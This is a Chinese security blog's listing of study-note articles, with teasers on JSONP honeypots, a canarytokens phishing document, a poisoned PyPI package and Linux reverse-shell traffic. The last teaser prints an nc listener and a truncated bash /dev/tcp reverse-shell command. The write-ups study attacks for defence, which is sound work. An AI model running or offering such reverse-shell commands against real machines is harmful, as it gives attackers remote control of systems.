蜜罐之jsonp技术学习
看了FuckJsonp项目,决定好好学习一下蜜罐利用的jsonp技术,于是有了该篇文章。0x01 同源策略很多文章已经给出解释了,同源策略(Same Origin Policy )为浏览器的安全机制,同源指的是协议、域名、端口相同,同源策略限制的是资源的访问,当不同源时,比如域名不同,a域名的下的JavaScript就无法访问b页面的cookie、DOM等资源,这里可以参考该文章web安全同...
Articles in the category of 学习笔记
- Home
- 学习笔记
fofahubkey钓鱼文档之canarytokens docx文件技术分析及实现
最近,有蓝队在github放FofaHubKey.docx钓鱼文件引诱红队人员下载打开,从而获取其出口ip,项目地址:https://github.com/fofahub/fofahubkey。微步已经给出报告,攻击者利用canarytokens网站生成的docx文件进行的钓鱼活动。有文章指出其使用的是OLE2Link对象技术插入的链接,但是笔者经过分析,发现并不是,而是使用的Include...
针对360tianqingRCE python库供应链污染的溯源分析
今天是某活动的第一天,上微步在线和各个群里康康在讨论啥。发现位于github的一个据称捕获了攻击队0day的名为360tianqingRCE的项目被爆出为红队的供应链攻击,于是顺着群内大佬的脚步我也分析了一下,以下为我个人和参考群里的讨论溯源分析的结果。0x01 PyPI库代码污染由于有大佬指出了问题所在,所以直接看该项目代码发现,在第5行导入了from fake_useragant imp...
OpenLDAP搭建与ldap认证流量简要分析
LDAP(Light Directory Access Portocol)轻型目录访问协议,通过IP协议提供访问控制和维护分布式信息的目录信息。通常使用ldap来实现访问控制、权限管理、资源管理等,Microsoft Active Directory即使用ldap协议来做域控用户登录认证,而OpenLDAP则是利用ldap协议实现开源的统一认证服务。本文OpenLDAP的搭建基于简书博主小尛...
linux反弹shell流量分析
反弹shell(reverse shell)是控制端监听某端口,受控端发起连接到控制端。互联网上有大量关于反弹shell的资料,这里不再论述,本文只是分析一下linux系统下各种反弹shell的流量。控制端:kali受控端:centos7控制端开启nc监听命令:nc -lvp 33330x01 Bash反弹shell/bin/bash -i >& /dev/tcp/192.16...